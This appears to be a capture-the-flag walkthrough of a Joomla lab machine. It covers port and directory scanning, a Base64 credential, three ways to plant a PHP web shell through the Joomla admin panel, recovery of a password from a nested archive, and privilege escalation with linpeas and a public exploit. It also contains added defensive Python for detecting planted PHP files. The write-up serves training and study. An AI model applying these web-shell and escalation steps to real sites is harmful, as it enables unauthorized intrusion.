Information gathering
└─# nmap -sV 10.129.215.122
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-09 21:59 EST
Nmap scan report for 10.129.215.122
Host is up (0.46s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.04 seconds
The favicon identifies the site as Joomla.
Directory scan
┌──(root㉿kali)-[~/Downloads/dirsearch-master]
└─# python3 dirsearch.py -u http://10.129.215.122
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11592
Output: /root/Downloads/dirsearch-master/reports/http_10.129.215.122/_23-01-09_22-06-39.txt
Target: http://10.129.215.122/
[22:06:39] Starting:
[22:06:55] 403 - 279B - /.ht_wsr.txt
[22:06:55] 403 - 279B - /.htaccess.bak1
[22:06:56] 403 - 279B - /.htaccess.orig
[22:06:56] 403 - 279B - /.htaccess.sample
[22:06:56] 403 - 279B - /.htaccess.save
[22:06:56] 403 - 279B - /.htaccess_sc
[22:06:56] 403 - 279B - /.htaccess_extra
[22:06:56] 403 - 279B - /.htaccess_orig
[22:06:56] 403 - 279B - /.htaccessBAK
[22:06:56] 403 - 279B - /.htaccessOLD2
[22:06:56] 403 - 279B - /.html
[22:06:56] 403 - 279B - /.htpasswd_test
[22:06:56] 403 - 279B - /.htm
[22:06:56] 403 - 279B - /.htaccessOLD
[22:06:56] 403 - 279B - /.httr-oauth
[22:06:56] 403 - 279B - /.htpasswds
[22:07:00] 403 - 279B - /.php
[22:07:40] 301 - 324B - /administrator -> http://10.129.215.122/administrator/
[22:07:41] 200 - 2KB - /administrator/
[22:07:41] 200 - 533B - /administrator/includes/
[22:07:41] 200 - 31B - /administrator/cache/
[22:07:41] 200 - 2KB - /administrator/index.php
[22:07:41] 301 - 329B - /administrator/logs -> http://10.129.215.122/administrator/logs/
[22:07:41] 200 - 31B - /administrator/logs/
[22:07:55] 200 - 31B - /bin/
[22:07:55] 301 - 314B - /bin -> http://10.129.215.122/bin/
[22:07:58] 200 - 31B - /cache/
[22:07:58] 301 - 316B - /cache -> http://10.129.215.122/cache/
[22:08:02] 200 - 31B - /cli/
[22:08:04] 200 - 31B - /components/
[22:08:04] 301 - 321B - /components -> http://10.129.215.122/components/
[22:08:06] 200 - 0B - /configuration.php
[22:08:31] 200 - 1KB - /htaccess.txt
[22:08:33] 301 - 317B - /images -> http://10.129.215.122/images/
[22:08:33] 200 - 31B - /images/
[22:08:34] 200 - 31B - /includes/
[22:08:34] 301 - 319B - /includes -> http://10.129.215.122/includes/
[22:08:34] 200 - 4KB - /index.php
[22:08:34] 404 - 3KB - /index.php/login/
[22:08:40] 200 - 31B - /layouts/
[22:08:40] 301 - 319B - /language -> http://10.129.215.122/language/
[22:08:42] 200 - 31B - /libraries/
[22:08:42] 301 - 320B - /libraries -> http://10.129.215.122/libraries/
[22:08:42] 200 - 7KB - /LICENSE.txt
[22:08:49] 301 - 316B - /media -> http://10.129.215.122/media/
[22:08:49] 200 - 31B - /media/
[22:08:53] 301 - 318B - /modules -> http://10.129.215.122/modules/
[22:08:53] 200 - 31B - /modules/
[22:09:10] 301 - 318B - /plugins -> http://10.129.215.122/plugins/
[22:09:10] 200 - 31B - /plugins/
[22:09:17] 200 - 2KB - /README.txt
[22:09:20] 200 - 395B - /robots.txt.dist
[22:09:24] 403 - 279B - /server-status
[22:09:24] 403 - 279B - /server-status/
[22:09:41] 200 - 31B - /templates/index.html
[22:09:41] 301 - 320B - /templates -> http://10.129.215.122/templates/
[22:09:41] 200 - 0B - /templates/system/
[22:09:41] 200 - 31B - /templates/
[22:09:41] 200 - 0B - /templates/beez3/
[22:09:41] 200 - 0B - /templates/protostar/
[22:09:44] 301 - 314B - /tmp -> http://10.129.215.122/tmp/
[22:09:44] 200 - 31B - /tmp/
[22:09:57] 200 - 567B - /web.config.txt
This gives the administrator back-end path; browsing the other files turned up nothing usable for now.
Browsing the home page reveals an account name, Floris.
The home page source contains a commented-out reference to a .txt file; requesting it returns an encoded string:
Q3VybGluZzIwMTgh
which Base64-decodes to:
Curling2018!
Log in to the back-end with it.
Back-end
Getting a shell from the Joomla back-end works much like it does for WordPress.
Method 1
Download the Joomla Chinese language pack com_zmaxappstore.zip from the official site, unzip it, edit install.xml to add `<filename>test.php</filename>`, place test.php in the admin folder, re-zip it, then in the back-end go to Extensions -> Install -> Upload Package File.
shell_url: /administrator/components/{zip package name}/da.php
Method 2
In the back-end go to Global Configuration -> Media -> Legal Extensions (File Types), add the php extension, then upload the file through the media manager.
Method 3
In the back-end go to Extensions -> Templates -> Templates -> xxx Details and Files, edit the error.php file, add the shell code, and Save.
shell_url: /administrator/templates/xxx/error.php
Create a new file, write a PHP one-liner into it, and connect to it.
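A defender-side counterpart to the three routes above, added here as an example (it is not part of the original post and not Joomla's own tooling): every one of them leaves a new or changed PHP file under a directory that should only change during a deliberate extension install, media upload or template edit, so a baseline-and-diff integrity check over those directories catches all three. The watched subdirectories (`images` as the media upload folder, `templates` and `administrator/components` for the other two) are assumptions about a stock Joomla layout, and the sample tree and file contents are constructed.

```python
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path

# Joomla subdirectories that only change during a deliberate install, upload or
# template edit (assumed stock layout; point WATCHED at the real web root).
WATCHED = ("templates", "administrator/components", "administrator/templates", "images")
PHP_SUFFIXES = (".php", ".phtml", ".phar", ".php5")


def hash_tree(root: Path) -> dict[str, str]:
    """SHA-256 of every regular file under the watched directories, keyed by POSIX relative path."""
    hashes: dict[str, str] = {}
    for sub in WATCHED:
        base = root / sub
        if not base.is_dir():
            continue
        for p in sorted(base.rglob("*")):
            if p.is_file():
                hashes[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return hashes


def diff_baseline(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify every path as added, modified or removed relative to the stored baseline."""
    return {
        "added": sorted(k for k in current if k not in baseline),
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "removed": sorted(k for k in baseline if k not in current),
    }


def suspicious_php(report: dict[str, list[str]]) -> list[str]:
    """New or changed PHP files in the watched directories: a component upload, a media
    upload with php allowed, or a template edit each produces exactly this footprint."""
    return sorted(p for p in report["added"] + report["modified"] if p.lower().endswith(PHP_SUFFIXES))


def demo() -> list[str]:
    """Constructed scenario in a temp dir: baseline a clean tree, then simulate the three changes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Clean install (constructed stand-in content, not real Joomla files).
        for rel, body in {
            "templates/protostar/error.php": "<?php // stock error page ?>",
            "templates/protostar/index.php": "<?php // stock index ?>",
            "images/logo.png": "PNG-bytes-placeholder",
            "administrator/components/com_media/media.php": "<?php // stock component ?>",
        }.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        baseline_json = json.dumps(hash_tree(root))  # what you would keep off-host

        # Simulated post-compromise state: template edited, PHP in the media folder,
        # new component directory containing PHP, plus one benign image change.
        (root / "templates/protostar/error.php").write_text("<?php // stock error page + extra line ?>")
        (root / "images/avatar.php").write_text("<?php // constructed marker ?>")
        (root / "administrator/components/com_constructed").mkdir()
        (root / "administrator/components/com_constructed/x.php").write_text("<?php // constructed ?>")
        (root / "images/banner.png").write_text("another image")  # benign, must not be flagged

        report = diff_baseline(json.loads(baseline_json), hash_tree(root))
        return suspicious_php(report)


if __name__ == "__main__":
    print(demo())
```

Store the baseline JSON somewhere the web server account cannot write, refresh it right after each legitimate update, and run the diff from cron or a scheduled job; the "Legal Extensions" change from method 2 is also worth checking directly in the back-end configuration, since it is the setting that makes the media route possible.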
Post-exploitation
Looking in the home directory shows the files, but user.txt is empty.
Requesting the password_backup file returns its contents: it is a hex dump, and the leading BZh shows what kind of file it came from.
https://en.wikipedia.org/wiki/List_of_file_signatures
Since it is known to be a compressed file, convert it back to binary.
There are no permissions to do that on the target, so download it locally and extract it there.
Use xxd with -r to reverse the dump back to binary:
root@kali# cat password_backup_orig | xxd -r > password_backup.bz2
root@kali# file password_backup.bz2
password_backup.bz2: bzip2 compressed data, block size = 900k
And decompress it:
root@kali# bunzip2 -k password_backup.bz2
Check the file type of the result; it turns out to be gzip-compressed:
root@kali# file password_backup
password_backup: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size 141
root@kali# mv password_backup password_backup.gz
Decompress it and check again: another bz2:
root@kali# gunzip -k password_backup.gz
root@kali# ls
password_backup password_backup.bz2 password_backup.gz password_backup_orig
root@kali# file password_backup
password_backup: bzip2 compressed data, block size = 900k
root@kali# mv password_backup password_backup2.bz2
Decompress again to get a tar archive:
root@kali# bunzip2 -k password_backup2.bz2
root@kali# ls -l
total 48
-rwxrwx--- 1 root vboxsf 10240 Oct 29 16:25 password_backup2
-rwxrwx--- 1 root vboxsf 141 Oct 29 16:25 password_backup2.bz2
-rwxrwx--- 1 root vboxsf 244 Oct 29 16:25 password_backup.bz2
-rwxrwx--- 1 root vboxsf 173 Oct 29 16:25 password_backup.gz
-rwxrwx--- 1 root vboxsf 1076 Oct 29 16:22 password_backup_orig
root@kali# file password_backup2
password_backup2: POSIX tar archive (GNU)
Extract it to get a text file containing the password:
root@kali# mv password_backup2 password_backup.tar
root@kali# tar xvf password_backup.tar
password.txt
root@kali# ls -l
total 56
-rwxrwx--- 1 root vboxsf 141 Oct 29 16:25 password_backup2.bz2
-rwxrwx--- 1 root vboxsf 244 Oct 29 16:25 password_backup.bz2
-rwxrwx--- 1 root vboxsf 173 Oct 29 16:25 password_backup.gz
-rwxrwx--- 1 root vboxsf 1076 Oct 29 16:22 password_backup_orig
-rwxrwx--- 1 root vboxsf 10240 Oct 29 16:25 password_backup.tar
-rwxrwx--- 1 root vboxsf 19 May 22 15:15 password.txt
root@kali# cat password.txt
5d<wdCbdZu)|hChXll
Online alternative: https://gchq.github.io/CyberChef
Just select the bzip operation.
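The same layer-by-layer unwrapping, using the magic-byte identification the page links to, written out as an added Python example (it is not from the original post; the CyberChef recipe does the same thing interactively). It builds its own nested sample in memory (the password inside is made up), reverses the xxd-style dump as `xxd -r` does, identifies each layer by signature the way `file` did above, and stops at a layer count or size limit, which is the caveat a practitioner wants when unpacking an untrusted archive chain.

```python
from __future__ import annotations

import bz2
import gzip
import io
import tarfile

# Signatures from the file-signature list linked above.
BZIP2_MAGIC = b"BZh"
GZIP_MAGIC = b"\x1f\x8b"
TAR_MAGIC = b"ustar"  # at offset 257 of a POSIX/GNU tar header

MAX_LAYERS = 10                # stop on absurdly deep nesting
MAX_BYTES = 50 * 1024 * 1024   # refuse to inflate past 50 MiB (decompression-bomb guard)


def hexdump_to_bytes(dump: str) -> bytes:
    """Reverse an xxd-style dump ("offset: hex groups  ascii") to raw bytes, as `xxd -r` does."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        hex_part = line.split(":", 1)[1].split("  ", 1)[0]  # hex column ends at the double space
        out += bytes.fromhex(hex_part.replace(" ", ""))
    return bytes(out)


def identify(data: bytes) -> str:
    """Name the outermost container by magic bytes, the way `file` did in the write-up."""
    if data.startswith(BZIP2_MAGIC):
        return "bzip2"
    if data.startswith(GZIP_MAGIC):
        return "gzip"
    if len(data) >= 262 and data[257:262] == TAR_MAGIC:
        return "tar"
    return "unknown"


def unwrap(data: bytes) -> tuple[list[str], dict[str, bytes]]:
    """Peel layers until a tar archive or unrecognised data remains.
    Returns the layer types seen and the final contents (tar members by name, or {'data': ...})."""
    layers: list[str] = []
    for _ in range(MAX_LAYERS):
        kind = identify(data)
        layers.append(kind)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            members: dict[str, bytes] = {}
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                for m in tf.getmembers():
                    if m.isfile():
                        members[m.name] = tf.extractfile(m).read()
            return layers, members
        else:
            return layers, {"data": data}
        if len(data) > MAX_BYTES:
            raise ValueError("decompressed size exceeds limit")
    raise ValueError("too many nested layers")


def build_sample_dump() -> str:
    """Constructed input mirroring the write-up's layering:
    password.txt -> tar -> bzip2 -> gzip -> bzip2 -> xxd-style hex dump. The password is made up."""
    secret = b"not-the-real-password\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    lines = []
    for off in range(0, len(blob), 16):
        chunk = blob[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {groups:<39}  {text}")
    return "\n".join(lines)


def recover_password(dump: str) -> str:
    """Full pipeline: dump text -> bytes -> unwrap -> password.txt contents."""
    _layers, files = unwrap(hexdump_to_bytes(dump))
    return files["password.txt"].decode().strip()


if __name__ == "__main__":
    sample = build_sample_dump()
    print(sample.splitlines()[0])                 # first line begins with "BZh", as on the target
    print(unwrap(hexdump_to_bytes(sample))[0])    # ['bzip2', 'gzip', 'bzip2', 'tar']
    print(recover_password(sample))
```

Run it against a real dump by replacing `build_sample_dump()` with the dump text read from disk; the layer list it prints is the same sequence of `file` results the manual session above went through.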
user
With the password, SSH in directly and read the user file.
root
No route to root was found by hand, so a privilege-escalation vulnerability script was used.
First upload it with SCP:
┌──(root㉿kali)-[~/Desktop]
└─# scp /root/Downloads/linpeas.sh floris@10.129.215.122:/home/floris
floris@10.129.215.122's password:
linpeas.sh
Then run bash linpeas.sh to get the vulnerability scan results.
Then just drop the 4034 exploit script onto the box and run it.
Done.